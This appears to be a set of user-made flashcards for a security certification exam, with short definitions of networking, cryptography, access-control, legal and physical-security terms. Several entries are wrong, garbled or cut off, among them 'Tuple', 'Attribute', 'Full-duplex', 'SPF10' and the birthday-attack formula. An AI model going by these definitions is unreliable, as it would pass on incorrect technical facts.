Science of hidden communications. Hide inside image, Encoding in pixels as bit streams.
Scrum
Scrum development model (named after a scrum in the sport of rugby) is an Agile model first described in "The New New Product Development Game". Holistic approach to Software Development.
SESAME
Secure European System for Applications in a Multi-vendor Environment. single sign-on system that supports heterogeneous environments. the addition of public key (asymmetric) encryption is the most compelling. It addresses one of the biggest weaknesses in Kerberos: the plaintext storage of symmetric keys
SHA-1, SHA-2
Secure Hashing Algorithm. Announced in 1993, and 2001 respectively. SHA-1 160 bit length. SHA-2; has 224, 256,384,512 bit length messages.
SLA
Service Level Agreements are vital when dealing with third-party development shops
SOA
Service Oriented Architecture. Attempts to reduce application architecture down to a functional unit of a service. SOA is intended to allow multiple heterogeneous applications to be consumer of services.
OSI Model
Seven layer model. APSTNDP
Shared Demarc
Shared Telecom Demarcation Point. Where ISPs responsibility end and the customers begins. Should employ strong physical access controls.
STP
Shielded Twisted Pair/Coaxial. Better than UTP
Active Response NIPS
Shoots dow malicious traffic via a variety of methods including forging. TCP RST segments to source or destination (or both), or sending ICMP port, host, or network unreachable to source.
Redundant Network Architecture
Should any single circuit or site go down, at least one alternate path is available
Positive Pressure Drain
Should be employed by HVAC. Means air and water should be expelled from the building. Water should drain away.
Object Reuse
Should be prevented. The act of recovering information from previously-used objects, such as computer files.
System Config Reevaluation.
Should happen every 3 years.
Employee Termination
Should result in immediate revocation of all employee access. Organizations worst enemy can be a disgruntled former employee. Termination should be fair
SDN
Software Defined Networking (SDN) separates a router's control plane from the data (forwarding) plane. Software Defined Networking (SDN) separates a router's control plane from the data (forwarding) plane
Open Source
Software or source code that is publicly available.
SSD
Solid State Drive, a combination of flash memory(EEPROM) and DRAM
Type 3
Something you are: Biometric
Type 2
Something you have: Badge
Type 1
Something you know: PIN
GPS/ IP and Geo-Location
Somewhere you are...
Striping
Spreading data writes across multiple disks to achieve performance gains, used by some levels of RAID
SDLC
Synchronous Data Link Control synchronous Layer 2 WAN protocol that uses polling to transmit data. Polling is similar to token passing
SONET
Synchronous Optical Networking. Carries multiple T-carrier circuits via fiber optic cable. Physical fiber ring for redundancy.
SONET
Synchronous Optical Networking: multiple T-carrier circuits via fiber optic cable
SDLC 2
System Concept Development
OpenFlow
TCP protocol that uses TLS encryption
Relation
Table
Garbage Collection
Takes care of old blocks. Unused and unerased blocks are moved out of the way and erased in the background. Identifies unneeded data and clears the blocks.
Encapsulation
Takes information from a higher layer and adds a header to it, treating the higher layer information as data. One layer's header is another layer's data."
Telnet
Telnet provides terminal emulation over a network. provides no confidentiality. Has limited integrity
BCI
The Business Continuity Institute. The Good Practice Guidelines (GPG) are the independent body of knowledge for good Business Continuity practice worldwide.
OWASP
The Open Web Application Security Project. Represents one of the best application security resources. OWASP provides a tremendous number of free resources dedicated to improving an organziations security posture.
SIEM
The Security Information and Event Manager is a primary tool used to ease the correlation of data across disparate sources
UDP
User Datagram Protocol. A simpler and faster cousin to TCP. UDP has no handshake, session, or reliability. Connectionless. Used for applications that are Lossy.
SDLC
The Systems Development Life Cycle. SDLC is used across the IT industry, but SDLC focuses on security when used in context of the exam. Standards are based on NIST
Brute Force
The attacker calculates the hash outputs for every possible password
Birthday Attack
The birthday attack is used to create hash collisions. Eg: If you add 22/365 + 21/365 + 20/365 + 19/365 ... + 1/365
Crux of SDLC
The concepts of security.
Security Domain
The list of objects a subject is allowed to access. Domains are groups of subjects. Confiedential, Secret, and Top Secret are three security domains used by the DoD.
***NOTE***
The most important objective for all controls is personnel safety. This is especially true for DRP
Ring -1
The newest mode of operation that utilizes a hypervisor(virtual machine, Intel VT, AMD-V).
Enticement
The perpetrator involved is determined to have already broken a law or is intent on doing so.
ARPAnet
The predecessor of the Internet
Tailoring
The process of customizing a standard for an organization
Scoping
The process of determining which portions of a standard will be employed by an organization
Recovery
The recovery phase involves cautiously restoring the system or systems to operational status.
Reporting
The reporting phase of incident handling occurs throughout the process, beginning with detection. Reporting must begin immediately upon detection of malicious activity.
Cryptology
The science of secure communications.
VoIP
Voice over Internet Protocol (VoIP) carries voice via data networks, a fundamental change from analog POTS (Plain Old Telephone Service), which remains in use after over 100 years
Background Check
Thorough investigation should be conducted before hiring someone. A criminal record check should be conducted. All experience and education, certifications verified.
Commandment #10
Thou shalt always use a computer in ways that ensure consideration and respect for your fellow humans.
Commandment #8
Thou shalt not appropriate other people's intellectual output.
Commandment #6
Thou shalt not copy or use proprietary software for which you have not paid.
Commandment #2
Thou shalt not interfere with other people's computer work.
Commandment #3
Thou shalt not snoop around in others computer files.
Commandment #5
Thou shalt not use a computer to bear false witness.
Commandment #1
Thou shalt not use a computer to harm other people/
Commandment #4
Thou shalt not use a computer to steal.
Commandment #7
Thou shalt not use other peoples computer resources without authorization or proper compensation.
Commandment #9
Though shalt think about the social consequences of the program you are writing or the system you are designing.
KLOC
Thousand(K) Lines Of Code
Misuse Case Testing
To formally model, again most likely using UML, how security impact could be realized by an adversary abusing the application
TCP
Transmission Control Protocol is a reliable Layer 4 protocol. Uses a three-way handshake to create reliable connections across a network
TLS
Transport Layer Security is the latest version of SSL, equivalent to SSL version 3.1. May be used to encrypt many types of data
TCP Flags
URG ACK PSH RST SYN FIN
Computer Fraud and Abuse Act - Title 18 Section 1030
US Law Pertaining to computer crimes. Attacks on protected computers, government, financial computers. $5,000 damage considered criminal.
Flash Memory
USB Thumb Drives. Specific type of EEPROM used for small portable disk drives. Magnetic field will not erase Flash Memory.
100baseT
UTP means 100 megabit, baseband, twisted pair.
Motion Detectors
Ultrasonic and microwave work like "Doppler Radar". Bounces. Photoelectric sends beam of light and alerts if light beam is broken. Sensors are active. Physical Intrusion detection Passive Infrared detects body heat.
UPS
Uninterruptible Power Supplies provide protection against electrical failure.
Primary Key
Unique value in table
Need to Know
User must need to know that specific piece of information before accessing it.
False Positive
User surfs the Web to an allowed site, and NIDS alerts
True Negative
User surfs the Web to an allowed site, and NIDS is silent
Mode of Operation(Access control)
Uses either a discretionary access control implementation or a mandatory access control implementation. 4 Modes: 1. Dedicated 2. System High 3. Compartmented 4. Mutlilevel
One-Time Pad
Uses identical paired pads of random characters, with a set amount characters per page. Eg: Y + C = B, then B - C = Y. The one time pad is the only encryption method that is mathematically proven to be secure. If the following three conditions are met.
Fiber Optic Network Cable
Uses light to carry information, which can carry a tremendous amount of information. Past 50 miles. Multimode uses light dispersion. Single Mode use one strand.
Asset Value(AV)
Value of an asset
Risk = Threat × Vulnerability Equation
Vulnerability scanning factor equating
Ward
Warded locks must turn a key through channels (called wards).
IAB Practice 3
Wastes resources (people, capacity , computer) through such actions.
WDM
Wavelength Division Multiplexing allows multiple signals to be carried via the same fiber
TFTP
Which runs on UDP port 69. It provides a simpler way to transfer files and is often used for saving router configurations or "bootstrapping"
WAN
Wide Area Network, typically covering cities, states, or countries
SAM File
Windows stores hashes for passwords on the Local Machine and Domain Controller in this file.
WLAN
Wireless Local Area Network. Generally has no way to assure availibility
802.11
Wireless technology. 802.11i is the first variation to provide reasonable security.
Civil Law(Common Law)
Within common law, civil law refers to laws put in place in in order to compensate a victim monetarily for damages.
Antivirus software
designed to prevent malware infections
Penetration Tester must...
always protect data and system integrity.
DNS cache poisoning attack
an attempt to trick a caching DNS server into caching a forged response.
Prototyping
an iterative approach that breaks projects into smaller tasks, creating multiple mockups (prototypes) of system design features.
Greenfield
an undeveloped lot of land
Relational Database
contain two-dimensional tables of related data.
Database Dictionary
contains a description of the database tables.
Decryption
converts ciphertext into plaintext
Static Routes
fixed routing entries stating "The route for network 10.0.0.0/8 routes via router 192.168.2.8." Small/Home Offices have static "default" route that sends all external traffic to one router. Set preferences via specific routing protocols
Operating System:
• System events • Audit records
Authentication Server (AS)
a server that authenticates a supplicant (802.1X)
Attribute
A Column in a attribute.
Well-Formed Transactions
Ability to enforce control over applications. This process is comprised of the "access control triple:" user, transformation procedure, and constrained data item.
Inactive Account Policy
Accounts inactive for more than 30 consecutive days. Identifying new accounts that have not been used for more than 10 days following their creation
NIST SDLC Step 11
Accreditation: The formal authorization by the accrediting (management) official for system operation and an explicit acceptance of risk.
11:CK
Acknowledge received data
Acquistion of Media
Acquisition will leverage binary backups and the use of hashing algorithms to verify the integrity of the binary images
Canons(2)
Act honorably, honestly, justly, responsibly, and legally
ARP
Address Resolution Protocol is used to translate between Layer 2 MAC addresses and Layer 3 IP addresses. Think ARP Cache poisoning(MitM)
Virtualization
Adds software layer between OS and Computer Hardware. Runs stocks OS
Access Control Categories
Administrative, Technical, Physical.
Overwriting
"Deleting" removes the entry from the File Allocation Table (FAT) and marks the data blocks as "unallocated"
BS-25999 and ISO 22301
"Part 1, the Code of Practice, provides business continuity management best practice recommendations Part 2, the Specification, provides the requirements for a Business Continuity Management System (BCMS) based on BCM best practice. specifies the requirements for setting up and managing an effective business continuity management system (BCMS) for any organization of any size/type.
WORM
(Write Once Read Many) Storage can be written to once, and read many time. Supports legal or regulatory compliance. Eg: CD-R (CD-RW and DVD-RW are not WORM media). SOme Digital Linear Tape(DLT) drives and media support WORM.
Halon Replacements
- Argon -FE-13 -FM-200 -Inergen
Core Principles of PCI-DSS
- Build and Maintain a Secure Network and Systems. - Protect Cardholder Data -Maintain Vulnerability Management Program -Implement Strong Access Control Measures. -Regularly Monitor and Test Networks. -Maintain an Information Security Policy.
"PASS" method (For Portable Extinguishers)
- Pull Pin - Aim Low - Squeeze the Pin - Sweep the fire
5 Components of PKI
-Certification Authorities (CAs) that issue and revoke certificates -Organizational Registration Authorities (ORAs) that vouch for the binding between public keys and certificate holders -Certificate holders that are issued certificates and can sign digital documents -Clients that validate digital signatures and their certification paths from a known public key -Repositories that store and make available certificates and Certificate Revocation Lists (CRLs)
IPv6 to MAC
-Take the MAC address: 00:0c:29:ef:11:36 -Embed the "fffe" constant in the middle two bytes: 00:0c:29:ff:fe:ef:11:36 -Set the "Universal Bit": 02:0c:29:ff:fe:ef:11:36 -Prepend the network prefix & convert to ":" format: fc01:0000:0000:0000:020c:29ff:feef:1136 -Convert one string of repeating zeroes to "::": fc01::20c:29ff:feef:1136
BCP/DRP Items:
1. Executive management support is needed for initiating the plan. 2. Executive management support is needed for final approval of the plan. 3. Executive management must demonstrate due care and due diligence and be held liable under applicable laws/regulations.
Forensic Phases
1. Identification of potential evidence 2. Acquisition of that evidence 3. Analysis of the evidence 4. Production of a report
Race Condition /etc/shadow
1. If the file "test" is readable by the user 2. Attacker deletes "test," creates symbolic link from "test" to /etc/shadow 3. Run another process 4. Then open the file "test" (now a symbolic link to /etc/shadow)
Expert System Example
1. If your computer is turned on a. Else: turn your computer on 2. Then if your monitor is turned on a. Else: turn your monitor on 3. Then if your OS is booted and you can open a cmd.exe prompt a. Else: repair OS 4. Then if you can ping 127.0.0.1 a. Else: check network interface configuration 5. Then if you can ping the local gateway a. Else: check local network connection 6. Then if you can ping Internet address 192.0.2.187 a. Else: check gateway connectivity 7. Then if you can ping syngress.com a. Else: check DNS
Five mistakes of Log Analysis
1. Logs are not reviewed on a regular and timely basis. 2. Audit logs and audit trails are not stored for a long enough time period. 3. Logs are not standardized or viewable by correlation toolsets—they are only viewable from the system being audited. 4. Log entries and alerts are not prioritized. 5. Audit records are only reviewed for the "bad stuff."
ISO 17799 11 Areas
1. Policy 2. Organization of Information Security 3. Asset Management 4. Human Resources Security 5. Physical and Environmental Security 6. Communications and Operations Management 7. Access Control 8. Information systems acquisition, development, and maintenance 9. Information security incident management. 10. Business continuity management 11. Compliance
8 Step Incident Handling Methodology
1. Preparation 2. Detection (aka Identification) 3. Response (aka Containment) 4. Mitigation (aka Eradication) 5. Reporting 6. Recovery 7. Remediation 8. Lessons Learned (aka Post-incident Activity, Post Mortem, or Reporting)
NIST Incident Response
1. Preparation 2. Detection and Analysis 3. Containment, Eradication and Recovery 4. Post-incident Activity
Object-Oriented Analysis and Design(OOAD) on NIDS
1. Sniffs packets from a network and converts them into pcap (packet capture) format; 2. Analyzes the packets for signs of attacks, which could include Denial of Service, client-side attacks, server-side attacks, web application attacks, and others; 3. If a malicious attack is found, the NIDS sends an alert. NIDS may send alerts via email, paging, syslog, or security information and event managers (SIEMs).
Class C
192.0.0.0 - 223.255.255.255 256 addresses
TCP Header Fields
20 bytes in all: - Source and Destination port - Sequence and Acknowledgment Numbers: Keep full-duplex communication in sync - TCP Flags - Window Size: Amount of data that may be sent before receiving acknowledgment COnnects from High number(ex: 51870 to Low Number(ex: 22)
Limited Broadcast Address
255.255.255.255
Graham-Denning Model
3 Part Model: Objects, Subjects, and Rules. Provides granular approach for interaction between subjects and objects. R1: Transfer Access R2: Grant access R3: Delete Access R4: Read Object R5: Create Object R6: Destroy Object R7: Create Subject R8: Destroy Subject
DoD Destruction Method(Gutman Approach)
3, 7 ,or 35 Successive Passes respectively. For undamaged magnetic media: now it is commonly considered acceptable in industry to have a simply single successful pass that renders data unrecoverable.
X86 CPU's
32 Bit Processors, CISC
Escrowed Encryption
3rd party organization holds copy of public /private key pair. Private key is divided into two or more parts, each held in escrow. Only release with proper authorization. Offers balance between privacy and need of law enforcement.
TCP/IP Model
4 layer model. Network Access, Internet, Transport, Application.
Divestitures
AKA De-mergers or De-acquisitions. One company become two or more. The split of sensitive information needs to be monitored closely as the risk of insider attacks will exist. i.e. Old credentials, duplicate accounts, badges, security controls.
Administrative Law
AKA Regulatory Law is law enacted by government agencies. The executive branch of the U.S. Government can create administrative law without requiring input from the Legislative branch.
Encapsulation
AKA data hiding
Defense-in-Depth
AKA layered defenses, applies multiple safeguards(controls: measures to reduce risk) to protect an asset. Multiple controls help improve the confidentiality, integrity, and availability of your data.
Cybersquatting
AKA typosquatting refers to an individual or organization registering or using, in bad faith, a domain name that is associated with another person's trademark
Swapping
AKA, Paging. Uses Virtual Memory. Copies a block of memory to or from a disk.
Asynchronous Response Mode
ARM Secondary nodes may initiate communication with the primary
Canon(4)
Advance and protect the profession.
Dummy File
Also called a flag, is a file that is provided to the tester in place of a real file containing sensitive or protected data.
Traceability Matrix
Also called an RTM can be used to map customers' requirements to the software testing plan
Strong authentication
Also called multifactor authentication requires that the user present more than one authentication factor
Synthetic Transactions
Also called synthetic monitoring: involves building scripts or tools that simulate activities normally performed in an application
Southbridge(Bus)
Also called the I/O Controller Hub connects Input/Output devices(i.e keyboard, mouse, CD Drive.
Northbridge(Bus)
Also called the Memory Controller Hub (MCH), connects the CPU to RAM and video memory.
Fetch & Execute
Also called, "Fetch, Decode, Execute." CPUs fetch machine language instructions.(add "1+1" 1.Fetch 2. Decode 3. Execute 4. Write(Save) These four steps take one clock cycle to complete.
Meeting Point Leader
Assures that all personnel are accounted for at the emergency meeting point. Avoid during evacuation
ATM
Asynchronous Transfer Mode. WAN technology that uses fixed length cells. 53 bytes long, with a 5-byte header and 48-byte data portion.
ARCNET(Deterministic)
Attached Resource Computer Network is a legacy LAN technology. ARCNET ran at 2.5 megabits and popularized the star topology
Known Key
Attacker knows something about the Key.
AOC
Attestation of Compliance
Server Rooms
Auditing physical access to server rooms is necessary to maintain physical security. Door security is key.
NIST SDLC Step 15
Audits and Monitoring: A system audit is a one-time or periodic event to evaluate security. Monitoring refers to an ongoing activity that examines either the system or the users.
CHAP
Challenge Handshake Authentication Protocol. A more secure authentication protocol. Does not expose clear text. PW stored on CHAP server.
LEAP
Cisco-proprietary protocol released before 802.1X was finalized. Flaws, should not be used
***Exam Warning***
Clark-Wilson requires that users are authorized to access and modify data. It also requires that data is modified in only authorized ways.
Classful IPv4 Networks
Classes A - E. For normal networks, A - C
Gates
Classes I - IV ASTM F2200
CIDR
Classless Inter-Domain Routing allows far more flexible network sizes than those allowed by classful addresses.
Full-duplex
Communication send or
Digital
Communications transfer data in bits: ones and zeroes
Centralized access control
Concentrates access control in one logical point for a system or organization. Instead of using local access control databases, systems authenticate via third-party authentication servers
Binary or Bit stream image
Creates an exact replica of the original data is needed
XSS
Cross-Site Scripting (XSS) leverages third-party execution of web scripting languages such as JavaScript within the security context of a trusted site.
Purpose(Policy)
Describes the need for policy to protect the confidentiality, integrity and availability of protected data.
Deterrent Controls
Deters users from performing actions on a system. Examples include a "beware of dog" sign.
SSL
Developed for Netscape Web Browser. Secure Sockets Layer(SSL) authenticates and provides confidentiality to Web Traffic. Transport Layer Security(TLS) is the successor to SSL. Used as a part of HTTP. Eg: Connect to a Website(asymmetric encryption), Browser downloads the digital certificate, includes public key.
SDLC 6
Development
NIST SDLC Step 4
Development/acquisition: The system is designed, purchased, programmed or developed.
Service Level Agreements
Dictate what is considered acceptable regarding things such as bandwidth, time to delivery, response times, etc.
DNS
Domain Name System a distributed global hierarchical database that translates names to IP addresses. Uses both UDP and TCP. 2 functions: gethostbyname()(given a name Returns an IP address. gethostbyaddr()(given an address.) Returns the name.
Deadbolt
Door cannot be closed when the deadbolt is locked. extend into the strike plate
Attestation
Ensures scrutiny has been applied to an organization's security posture. Attestation of security posture usually follows an audit. SAS 70 Review
XOR
Exclusive Or. The secret sauce behind modern encryption. Combining a key with a plaintext via XOR creates a ciphertext. XOR-ing the same key to the ciphertext restores the original plaintext.
Privileged Programs
Execution bit "s" is defined as superuser set uid/gid
PATRIOT Act of 2001
Expanded law enforcements electronic monitoring capabilities. Broader coverage for wiretaps, search and seizure without immediate disclosure. Generally lessened judicial oversight of law enforcement.
Due Diligence
Expectation of staff/subordinate to exercise due care.
RAID 10(1 + 0)
Explicitly indicate the nesting, the configuration is that of a striped set of mirrors. System Redundancy
Chain of Custody
Express the reliability of evidence. Once evidence is acquired, full documentation be maintained regarding the who, what, when, and where relating to the handling of said evidence. i.e. signatures.
The Copyright Term Extension Act, 1998
Extended the Copyright term by 20 years. At the time, Author copyright was 50 years, 75 for Corporate.
EAP
Extensible Authentication Protocol is an authentication framework that describes many specific authentication protocols. Provides authentication at Layer 2"port based"
XML
Extensible Markup Language. Standard wary to encode documents and data. XML is similar to HTML. Used on the web but not tied to it. XML is used to define a users own data format.
EGP
Exterior Gateway Protocols BGP (Layer 3)
Doors
External facing hinges are a security concern.
Proxy Firewalls
Firewalls that act as intermediary servers. Both the packet filter and stateful firewalls pass traffic through or deny it. Proxies terminate connections.
Mantrap
First door locks before second can open.
Forensic Software Analysis
Focuses on comparing or reverse engineering software: reverse engineering malware is one of the most common examples. Investigators are often presented with a binary copy of a malicious program, and seek to deduce its behavior
Communications and Network Security
Focuses on the confidentiality, integrity and availability of data in motion.
Tailgating
Following an authorized person into a building without providing credentials
Business Continuity Planning
For ensuring that the business will continue to operate before, throughout, and after a disaster event is experienced.
Shareware
Fully functional proprietary software that may be initially used free of charge
IPv4
Internet Protocol version 4 is the fundamental protocol of the Internet. IPv4 was used for the Arpanet. imple protocol, designed to carry data across networks. 32 bit addresses
IDS
Intrusion Detection System. Detective device designed to detect malicious (including policy-violating) actions
IPS
Intrusion Prevention System. A preventive device designed to prevent malicious actions.
Vernam Cipher
Invented by Gilbert Vernam(Employee of AT&T Bell Labs). Used bits that were XORed to plaintext bits.
Active-passive cluster
Involves devices or systems that are already in place, configured, powered on, and ready to begin processing network traffic should a failure occur on the primary system.
Active-active cluster
Involves multiple systems all of which are online and actively processing traffic or data
Partial and Complete Business Interruption
Involves real interruption. Extreme caution should be exercised before attempting an actual interruption test.
Smoke detectors
Ionization and Photoelectric. Dust can trigger leading to false alarms
Free software
Is a controversial term that is defined differently by different groups.
Kerberos Steps
Kerberos Principal Alice contacts the KDC The KDC sends Alice a session key, encrypted with Alice's secret key. The KDC also sends a TGT (Ticket Granting Ticket), encrypted with the TGS's secret key Alice decrypts the session key and uses it to request permission to print from the TGS (Ticket Granting Service). Seeing Alice has a valid session key (and therefore has proven her identity claim), the TGS sends Alice a C/S session key (second session key) to use to print. The TGS also sends a service ticket, encrypted with the printer's key. Alice connects to the printer. The printer, seeing a valid C/S session key, knows Alice has permission to print, and also knows that Alice is authentic. ***KDC and TGS are separate services.***
Kerberos FAQ`
Kerberos is a network authentication system for use on physically insecure networks, based on the key distribution model presented by Needham and Schroeder. It allows entities communicating over networks to prove their identity to each other while preventing eavesdropping or replay attacks. It also provides for data stream integrity (detection of modification) and secrecy (preventing unauthorized reading) using cryptography systems such as DES (Data Encryption Standard)."
Key Clustering
Key Clustering occurs when two symmetric keys applied to the same plaintext produce the same ciphertext
Diffie-Hellman Key Agreement Protocol
Key agreement allows two parties to securely agree on a symmetric key via a public channel, such as the Internet, with no prior key exchange
Key locks
Key locks require a physical key to unlock. Many keys contain the bitting code for the key. 74226. 0-9(0 shallow, 9 quite deep
Expert Systems
Knowledge Base and Inference Engine
Rijndael
Known as AES. Best combination of security, performance, efficiency, and flexibility.
Costliness of DRP Testing
LEAST • DRP Review •ReadThrough/Checklist/Consistency • Structured Walkthrough/Tabletop • Simulation Test/Walkthrough Drill • Parallel Processing • Partial Interruption • Complete Business Interruption MOST
Wiring closets
Lack of security regarding wiring closets present a physical access issue
Progressive Discipline
Ladder of Discipline. Coaching. Formal Discussion. Verbal warning meeting, with Human Resources attendance. Written warning meeting, with Human Resources attendance (perhaps multiple warnings). Termination
Microsoft LM
LanMan passwords are converted to upper case before hashing, and therefore case sensitivity is irrelevant)
Bridges
Layer 2 Device. 2 ports. Connects network segments together. Learns MAC addresses of nodes on either side. Provides traffic isolation. 2 "Collision" Domain.
Bridge
Layer 2 Device. Has 2 ports, and connects network segments together. Segments have multiple nodes. Learns the MAC Addresses on nodes on either side. Has 2 collision domains.
Application Layer Proxy Firewalls
Makes decisions based on Application Layer Data(e.g. HTTP Traffic). Must understand the protocol that Is proxied (often dedicated)
Virtualization Issues
Multiple hosts on one system raises security concerns.
SDLC 9
Operations and Maintenance
Discrete Logarithm
Opposite exponentiation. Computing 7 to the 13th power (exponentiation) is easy on a modern calculator: 96,889,010,407 Asking the question "96,889,010,407 is 7 to what power"
Diffusion
Order of plaintext should be diffused in the ciphertext.
Data Collection Limitation
Organization should collect the minimum amount of sensitive information that is required. There should be limits to the collection of personal data.
Key Storage
Organization that issues the public/private key paris retains a copy.
OFDM
Orthogonal Frequency-Division Multiplexing
Shared Tenancy
Other tenants pose a risk because they are already behind perimeter. Adjacent buildings also pose a risk. British Bank of the Middle East(1976...Hole in Church)
OFB
Output Feedback. Differs from CFB in the way feeback is accomplished. Uses previous ciphertext for feedback. **STREAM**
Halon
Ozone depleting properties. Chemical reaction that consumes energy and lowers the temperature of the fire. See Montreal Protocol.
PDA
PDAs should use secure wireless connections
SPF10
PDU's; Segments, Packets, Frames, Ones and Zeroes
PCI-DSS
Payment Card Industry Data Security Standards. Industry Specific. Created by PCI-SSC. Standards seek to protect credit cards by requiring vendors using them to take specific security precautions. It is a multi-faceted security standard that includes requirements for security management. Protecting customer data.
Arithmetic Logic Unit(ALU)
Performs mathematical calculations. It computes. It is fed instructions by the control unit which acts as traffic cop
PII
Personally Identifiable Information
Conflicts Of Interest(CoIs)
Pertain to accessing company sensitive information from different companies that are in direct competition with one another. Eg: Chinese Wall Model requires that CoIs be identified so that once a consultant gains access to one CoIs.
Crosstalk
Poorly shielded or too close cable impacts a separate conversation.
PAT
Port Address Translation. typically makes a many-to-one translation from multiple private addresses to one public IP address. Solution for homes and small offices.
PGP
Pretty Good Privacy brought Asymmetric Encryption to the masses(1991). Users could communicate without sharing a key. Provides confidentiality, integrity, authentication, and nonrepudiation. Used to encrypt emails, documents, or disk drives. Web of Trust Model, Trust me, Trust everyone that I trust
Controlling Access
Preventing unauthorized access.
Access Control Types(6)
Preventive Detective Corrective Recovery Deterrent Compensating
Locks
Preventive physical security control.
Memory Protection
Prevents one process from affecting the confidentiality, integrity, or availability of another.
Computer Bus
Primary communication channel on a computer system. Communication between CPU, Memory, I/O Devices occur via the bus.
Microsoft Windows Active Directory
Primary means to control access. Uses Kerberos. Has been integrated into Microsoft Windows operating systems since Windows 2000
Factoring prime numbers
Prime Number: divisible by 1 and itself Composite Number: Evenly divisible by numbers other than 1 and itself. Eg: "which prime number times which prime number equals 49,418,527" is much more difficult
RFC 1918 addresses
Private IPv4 addresses that may be used for internal traffic 10.0.0.0 - 10.255.255.255/8 172.16.0.0 - 172.31.255.255/12 192.168.0.0 - 192.168.255.255/16
UPSs
Protect against electric failures. Backup power is provided via batteries or fuel cells.
Surge Protectors,
Protect against electric failures. Circuit or fuse that is tripped during a power spike or surge
Canons(1)
Protect society, the commonwealth, and the infrastructure.
PEAP
Protected EAP; Cisco Systems, Microsoft, and RSA Security, is similar to (and may be considered a competitor to) EAP-TTLS. Doesn't require client-side certificates.
Data Execution Prevention
Protection against memory corruption. Ensures that memory locations not pre-defined to contain executable content will not have the ability to have code executed. Prevents shell code execution
Link State Routing Protocols
Protocol factors in additional metrics for determining the best route, including bandwidth.
Virtual Memory
Provide Virtual Addresses between applications and hardware memory> ***Allows Swappng***
Canons(3)
Provide diligent and competent service to principals.
Ten Commandments of Computer Ethics
Provided by the Computer Ethics Institute as code for information security professionals to abide by.
Network Tap
Provides a way to tap into network traffic and see all traffic(including all unicast) Taps are the preferred way for access to sniffer or NIDS
Authentication Header(AH)
Provides authentication and integrity for each packet of the network data. Acts as a digital signature for The data. Protects against replay attacks.
Secure Real-time Transport Protocol
Provides confidentiality, integrity, and secure authentication. oIP traffic sent via insecure networks should be secured via SRTP
ShiftRows
Provides diffusion by shifting rows Row 0 is unchanged Row 1 is shifted 1 left Row 2 is shifted 2 left Row 3 is shifted 3 left
Custodian
Provides hands-on protection of assets such as data. Follow detailed orders.
Tailoring Process: 6
Providing additional specification information for control implementation, if needed. Tailoring process involves "parameters" including; password complexity policies
Fire Suppression
Reduce Temperature Reduce Oxygen Supply Reduce Fuel Supply Interfere Reaction
RISC
Reduced Instruction Set Computer. Uses a reduced set of simpler instructions.
Register Direct Addressing
References a CPU cache register
Internet of Things (IOT)
Refers ato a small internet of connected devices, smart meters, baby monitors, cash registers, cars, fitness monitors. All things are directly accessible via the internet.
Covert Timing Channel
Relies on system clock to infer sensitive information
Remediation
Remediation steps occur during the mitigation phase, where vulnerabilities within the impacted system or systems are mitigated.
RADIUS
Remote Authentication Dial In User Service , a third-party authentication system. 1812, 1812, 1645, 1646. Ensures authentication, authorization, and accounting
Overwriting
Results are poor. It is not a universally reliable method of sanitization.
RARP
Reverse ARP. used by diskless workstations to determine its IP address. "Who am I? Tell me."
SSL
Secure Socket Layer designed to protect HTTP (Hypertext Transfer Protocol) data: HTTPS uses TCP port 443. May be used to encrypt many types of data. SSL client software does not require altering the operating system
SAML
Security Association Markup Language. XML based framework for exchanging security information.
NIST SDLC Step 13
Security Operations and Administration: Examples include backups, training, managing cryptographic keys, user administration, and patching.
NIST SDLC Step 10
Security Testing: Used to certify a system; may include testing security management, physical facilities, personnel, procedures, the use of commercial or in-house services (such as networking services), and contingency planning.
NIST Special Publication 800-53
Security and Privacy Controls for Federal Information Systems and Organizations
Mobile Device Attacks
Security challenges ranging from USB Flash Drives and Laptops.
NIST Special Publication 800-14
Security, like other aspects of an IT system, is best managed if planned for throughout the IT system life cycle. There are many models for the IT system life cycle but most contain five basic phases: initiation, development/acquisition, implementation, operation, and disposal."
IAB Practice 1
Seeks to gain unauthorized access to the resources of the internet
Confidentiality
Seeks to prevent the unauthorized disclosure of information: it keeps data secret
Tailoring Process: 3
Selecting compensating security controls, if needed;
Half Duplex
Send or receive at one time only (Walkie Talkie)
RSA
Sends AES key(symmetric). Symmetric key is called a session key. A new session may be retransmitted via RSA Approach leverages the strengths of both cryptosystems.
Backups
Sensitive backup data should be stored offsite, whether transmitted offsite via networks, or physically moved as backup media. Ensure backup sites are unlikely to be impacted by the same disaster that may strike the primary site.
Software Defined Networking
Separates a router's control plane from the data. Data plane forwards data (packets) through the router
Layering
Separates hardware and software functionality into modular tiers
Flat file
Simplest form of a database
SSO Advantages
Simplified administration, Improved user productivity, Improved developer productivity.
SSO
Single Sign-On is where a subject may authenticate once, and then access multiple systems
Tuple
Single cell in a relational database
"Point. Click. Root"
Slogan illustrates the fact that script kiddie tools such as the Metasploit Framework are of high quality and can achieve impressive results.
Pre-Action
Systems are a combination of wet, dry, or deluge systems, and require two separate triggers to release water
T Carriers
T1 is a dedicated 1.544-megabit (1.5mb) A T3 is 28 bundled T1s(45 mb)
TACACS+
TACACS+ provides better password protection by allowing two-factor strong authentication. Uses TCP port 49 for authentication with the TACACS+ serve
IRC server
TCP port 6667 by default. Used by malware, which may "phone home" to a command-and-control channel via IRC. Chat software may be subject to various security issues, including remote exploitation, and must be patched like any other software
***Note***
TCP, UDP, and ICMP are Layer 4.
BCP/DRP Reminder
These are the final controls. If these fail, the business can fail. "Have we made mistakes that threaten the success of our plan?"
Transport Mode
Transport Mode only encrypts the data (and not the original headers); AH is often used along with ESP in transport mode.
TDES
Triple Data Encryption Standard: Public algorithm that has stood the test of time
4 Types of events
True Postive, True Negative, False Positive, and False Negative.
TCSEC(AKA "The Orange Book")
Trusted Computer System Evaluation Criteria. Also ITSEC, and "The Common Criteria." Criteria and Evaluation Method for choosing security products. D: Minimal Protection C: Discretionary Protection B: Mandatory Protection A: Verified Protection One of the first security standards implemented
TNI/Red Book
Trusted Network Interpretation(TNI) brings TCSEC concepts to network system. It is often called the "red book", due to the color of it's cover. *TCSEC does not address network issues.
Tunnel Mode
Tunnel mode provides confidentiality (ESP) and/or authentication (AH) to the entire original packet. Both modes add extra IPsec headers
Fuzzing
Type of black box testing that submits random, malformed data as inputs into software programs to determine if they will crash. Random input strings, command line inputs, environment variables. Any program that crashes has failed the fuzz test.
Software Testing Levels
Unit Testing, Installation Testing, Integration Testing, Regression Testing, and Acceptance Testing
UTP
Unshielded Twisted Pair; susceptible to EMI and crosstalk
Fiber Optic Cables
Use light instead of electricity to Transmit Data
Digital Watermarks
Used for fingerprinting data, images.
Trunks
Used to connect multiple switches.
Digital Signatures
